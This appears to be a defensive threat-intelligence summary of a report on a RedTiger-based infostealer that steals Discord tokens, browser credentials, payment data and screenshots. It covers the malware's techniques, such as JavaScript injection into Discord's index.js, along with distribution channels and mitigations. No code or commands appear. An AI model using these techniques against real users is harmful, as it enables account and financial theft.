Full Report
Attackers are using the open-source red-team tool RedTiger to build an infostealer that collects Discord account data and payment information. [...]
Analysis Summary
# Hackers steal Discord accounts with RedTiger-based infostealer
Hackers are using the open-source red-team tool RedTiger to build an infostealer that collects Discord account data and payment information, as well as credentials stored in browsers, cryptocurrency wallet data, and game accounts.
## Key Points
- Attackers use RedTiger's info-stealer component to target French Discord account holders.
- The malware scans for Discord and browser database files, extracts tokens, and injects custom JavaScript into Discord's index.js to intercept API calls.
- The malware also captures payment information, web browsers' saved passwords, cookies, history, credit cards, and desktop screenshots.
- RedTiger is distributed through various means, including Discord channels, malicious software download sites, forum posts, malvertising, and YouTube videos.
## Threat Actors
- No attribution available in the article.
## TTPs
- Use of RedTiger's info-stealer component to target specific users.
- Injection of custom JavaScript into Discord's index.js to intercept API calls.
- Harvesting of payment information, web browsers' saved passwords, cookies, history, credit cards, and desktop screenshots.
- Anti-sandbox mechanisms to evade forensic analysis.
## Affected Systems
- Windows and Linux systems.
- Discord accounts and browser databases.
## Mitigations
- Avoid downloading executables or game tools from unverified sources.
- Revoke Discord tokens and change passwords immediately after suspecting compromise.
- Enable MFA everywhere and clear saved data from browsers.
- Use a reputable security suite to detect and block malicious activity.
## Conclusion
The use of RedTiger-based infostealers poses a significant threat to users' sensitive information, particularly in the gaming and Discord communities. Users must be cautious when downloading files or using unverified software, and take immediate action to protect themselves if they suspect compromise.